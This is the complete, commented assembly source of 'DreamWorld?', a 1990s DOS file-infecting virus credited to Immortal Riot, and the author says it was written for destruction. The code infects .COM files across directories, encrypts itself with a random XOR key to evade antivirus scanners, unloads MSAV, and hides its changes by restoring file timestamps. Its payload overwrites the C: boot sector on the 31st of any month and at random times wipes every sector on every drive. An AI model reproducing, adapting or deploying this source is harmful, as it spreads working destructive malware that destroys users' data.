;                         -DreamWorld?-
;      "Created by Immortal Riot's destructive development team"
;             (c) 93/94 Immortal Riot - All rights reserved                 
;
; Dedication:
;  "If Metal Militia was dead, this virus should be deadicated to him"
;
; Notes: 
;  This was 'written' in one day. It sucks, but not as good as my..
;  ahh.. now I remember, I don't got a girl-friend, but my "girl-friend"
;  think she got a boy-friend? Huh? She's nuts!
;
; Notes_II:
;  F-Prot, Scan, TBAV, FindViru can't find shits of this code.
;
; Disclaimer: 
;  Well, I just gotta have one, you know. So, I hereby claim this:
;  "I take no responsability for any damage, either direct or implied,
;  caused by the usage of the virus source code or of the resulting code
;  after assembly. No warrant is made about the product functionability
;  or quality. The code was written in pure educational purposes ONLY." 
; 
; Truth: 
;  Well, this was written only for malicious intends. I havn't learned
;  a shit by writing this shit. Now you know that.. Well, I just had
;  some hours spare time, and a huge appetite for destruction. That's why 
;  this virus was created. No more, no less. Ciao! /The Unforgiven

.model tiny			;
.code				;
org    100h			;
				;
Start:  			;
db 0e9h                         ; Jump to start1 and mark this file
DW  0                           ; as virus-infected!
				;
Start1:				;
xchg ax,ax                      ; It's simply two NOPs
nop				; 
				;
mov  ax,0fa01h                  ; Let's un-install MSAV junk program
mov  dx,5945h                   ; from memory for a cost of 8 bytes :)
int  16h                        ; 
				;
call get_delta                  ; Get the delta offset
get_delta:			;
pop     bp                      ;
sub     bp, offset get_delta    ;
				;
Call_en_de_crypt:		; Well, just using alternitive code
mov     ax,bp                   ; for a "call en_de_crypt", for satisfying
add     ax,011dh                ; my very sick brain..     
push    ax			;
jmp     short en_de_crypt       ; 
jmp     short real_code_start   ; Sneee!
				;
crypt_val dw 0                  ; We get a random value for each encryption!
				; 
Write_virus:			;
call    en_de_crypt 		; Encrypt virus before we write!
mov     ah,65d                  ; 65d - 1d = 40HEX!
sub     ah,1d                   ; ^^^ How meaningless!
mov     cx, end_of_virus - start1     ; CX = bytes to write
lea     dx, [bp+start1]         ;     ; DX = Where to write from (100h)
int     21h                     ;     ; Duh!
				;
call en_de_crypt                ; Decrypt virus again 
ret                  		;
				;
En_de_crypt:			; Heuristic, Heuristic, eat this!
				;
mov     ax,word ptr [bp+crypt_val]       
lea     si,[bp+encrypt_start]	;
mov     cx,(end_of_virus-start1+1)/2
				;
Xor_loop:			;
xor     word ptr [si],ax        ; Encrypting two bytes/loop, until
add     si,2                    ; all the code between encryption_start
loop    xor_loop                ; to end_of_virus is encrypted!
ret 				;
				;
Encrypt_start: 		        ; All code here and below is encrypted,
Real_code_start:	       	; making it hard for heuristic scanners!
				;
mov     ah,2ah			; First, we check for what date it is
int     21h			;
cmp     dl,31                   ; Is it the 31st any month?
jne     not_now                 ; Nop!
				;
Cruel:				;
mov     ah,09h			; It's the 31st any month!
lea     dx,[bp+v_name]		; or the 1/100 of a second = 1
int     21h                     ; we'll print a message!
				;
mov     al,2h                	; and after that, we'll brutally
mov     cx,1			; overwrite the first-sector on
lea     bx,v_name	        ; drive C: with our virus name!
cwd				;
int     26h			;
				;
Not_now:                        ; It wasn't the 31:st, so,
mov     ah,2ch			; we'll take a random number
int     21h			; from a 1/100 of a second and if
cmp     dl,1			; the value is 1, we'll trash the
je      cruel			; boot-sector on drive C: and if
cmp     dl,98			; the value is 99 we will brutally
jbe     no_harm			; destroy all sectors on all drives.
				;
Trash_sucker:			; 
mov     al,2h			; We'll start on drive C: (2h)
Drive:				; We'll overwrite one sector/run!
mov     cx,1			; with our virus name, and we'll
lea     bx,v_name	        ; write from sector one, with the
xor     dx,dx			; very nice interrupt 26h (sector write!)
Next_Sector:			; and after we've written one sector we'll
int     26h			; jump to the next sector and overwrite
inc     dx			; that too, and loop until all sectors are
jnc     next_sector		; being overwritten, then, we'll jump to 
inc     al		        ; the next drive, and overwrite all sectors
jmp     short drive		; there as well. And the next drive, and
                                ; the next.. :-). 
No_Harm:			;
lea     dx,[bp+offset dta]      ; Set the DTA to variable called DTA
call    set_dta			; (DTA=42 byte chunk of memory!)
				;
Buf_Xfer:			; Restore the beginning..
lea     si, [bp+offset org3]    ; 
mov     di, 100h                ; DI=100h
push    di		        ; Store di with our new value.
movsw                           ; Move string by word (the first two bytes!)
movsb                           ; Move string by byte (the third byte in the
			        ; buffer), b'cos our org3 buffer is 3 bytes!
				;
Get_drive:			;
mov     ah,19h			; We'll get the drive from were we're executed
int     21h			; from, and if an infected file is being run
cmp     al,2			; from A: or B: we'll not search for more files
jae     Get_dir			; to infect b'cos we havn't got a int24 handler.
ret				; Let the infected files run normally!
				;
Get_dir:			; Get directory from where we're being executed
mov     ah,47h			; from. Must do that b'cos we're using the
sub     dl,dl			; dot-dot method to travel around!
lea     si,[bp+end_of_virus+2ch];
int     21h			;
				;
Findfirst:			;
mov     ah, 4eh                 ; FindFirst file
lea     dx, [bp+masker]         ; with the extension of 'COM'
_4fh:                           ; When called ah=4fh (findnextfile)
int     21h			;
jnc     open_file		; We found a file!
          			; Then, open it!
Chdir:				;
mov     ah,3bh                  ; We didn't find any files
lea     dx,[bp+offset dot_dot]  ; in the current dir, so we'll move
int     21h			; to the ".." location in the tree and
jc      quit			; search for more files, if location doesn't
jmp     short findfirst		; exist (ax=03h), we'll quit, otherwise, we'll
				; search for the first file in the new dir.
Open_file:			;
mov     ax, 3D02h               ; Open the file in read/write mode
lea     dx, [bp+offset dta+1eh] ; Filename is located in DTA at offset 1Eh
int     21h			;
xchg    ax, bx                  ; Faster/bigger than mov BX,AX
  				;
mov     ax,5700h                ; Take the file's time/date
int     21h			; (ah=57h = get/set time/date)
				; (al=01h = get time/date)
push    cx                      ; Store time!
push    dx                      ; Store date!
				;
mov     cx, 3                   ; Read first three bytes of the file
lea     dx, [bp+org3]		; to the buffer (org3)
mov     ah, 3fh			; 
int     21h			;
                                ; Check if already infected
mov     cx, word ptr [bp+ORG3+1];      
mov     ax, word ptr [bp+DTA+1ah]
add     cx, end_of_virus - start1 + 3 
cmp     ax, cx                  ;      
jz      restore_time_date       ; It's already infected!
  				; No, it's not infected! 
sub     ax, 3                   ; 
mov     word ptr [bp+writebuffer], ax 
  				;
xor     al, al                  ; Then, we'll move the file-poiter to
call    f_ptr			; the beginning of the file, and
mov     cx, 3                   ; Write three bytes (our own jmp)
lea     dx, [bp+e9]		; 
mov     ah, 40h			;
int     21h			;
				;
mov     al, 2                   ; Then, we'll move the file-pointer to
call    f_ptr			; end_of_file.
  				;
Get_Random:			;
mov     ah,2ch			; Darn, this little trick is really
int     21h			; cool, b'cos we'll not get the same
add     dl, dh			; encryption-value on any infected file,
jz      get_random		; resulting in no bytes except the one used
mov     word ptr [bp+crypt_val],dx; for the decrypt routine remains constant!
				;
call    write_virus		; Now, write the virus!
  				;
Restore_time_date:		; Cover our tracks..
pop     dx			; Restore file date!
pop     cx			; Restore file time!
				; Notice the order "push cx/dx pop dx/cx!"
mov     ax,5701h                ; ah=57h (get/set attribs),
int     21h			; al=01h (set attribs)
				;
Close_file:			;
mov     ah, 3eh                 ; Close the file,
int     21h			; which now is infected!
  				;
mov     ah, 4fh                 ; This little trick, is really
jmp     short _4fh              ; really neat, I think..
				;
Quit:				;
lea     dx,[bp+end_of_virus+2ch]; First, we'll change back to the
mov     ah,3bh			; directory from where we were executed
int     21h			;
				;
Fix_it:				;
mov     dx, 80h                 ; Then, we'll set back the DTA to its
                                ; default value (note- this is NOT used
				; when the virus is running!)
Set_dta:			;
mov     ah, 1ah                 ; Set the dta, used twice in this virus,
int     21h                     ; one when we started, and now, when we're
				; ready!
Exit:				; Then, we'll return and execute
retn                            ; the "real" program!
				;
F_ptr:  			; Since we moved the file-pointer to
mov     ah, 42h			; end of file twice, this saves some
xor     cx, cx			; bytes!
cwd                             ; Clear dx (smallest variant!)
int     21h                     ;
retn				; Return to caller!
  	            		;
V_name  db '[DreamWorld?]','$'	; It's the name for the virus
dream   db '"I have a dream..."'; Me and Martin Luther King!
msg     db 'Copy me, so I can travel around the globe!'
        db 'Spreading my message, manipulating your'
        db 'thoughts, your mind, and your actions'
        db '"Love, Peace, Empathy!"'
copyr   db "(c) 93/94 Immortal Riot - All rights reserved!"      
		   
Dot_dot db      '..',0 
Masker  db      '*.com',0 
Org3    db      0cdh, 20h, 0 ; original three bytes saved here
E9      db      0e9h ; the jmp
End_of_virus equ $
Writebuffer  dw  ?               ; Scratch area for the JMP
Dta         db 42 dup (?)        ; 42 bytes of chunk in memory, but
				 ; not in the files!
Virus_end:
end start